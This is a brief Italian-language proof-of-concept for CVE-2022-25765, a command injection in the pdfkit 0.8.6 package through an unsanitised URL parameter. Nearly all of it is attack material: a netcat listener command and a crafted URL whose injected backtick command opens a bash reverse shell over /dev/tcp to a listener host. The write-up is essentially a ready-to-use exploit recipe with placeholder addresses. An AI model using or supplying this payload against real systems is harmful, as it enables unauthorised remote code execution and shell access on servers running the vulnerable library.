
Proof-of-concept exploit per CVE-2022-25765 che dimostra l'iniezione di comandi in pdfkit 0.8.6 tramite parametro URL non sanificato, consentendo l'esecuzione remota di codice e una reverse shell.
Il pacchetto pdfkit dalla versione 0.0.0 è vulnerabile a Command Injection poiché l'URL non viene adeguatamente sanitizzato.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}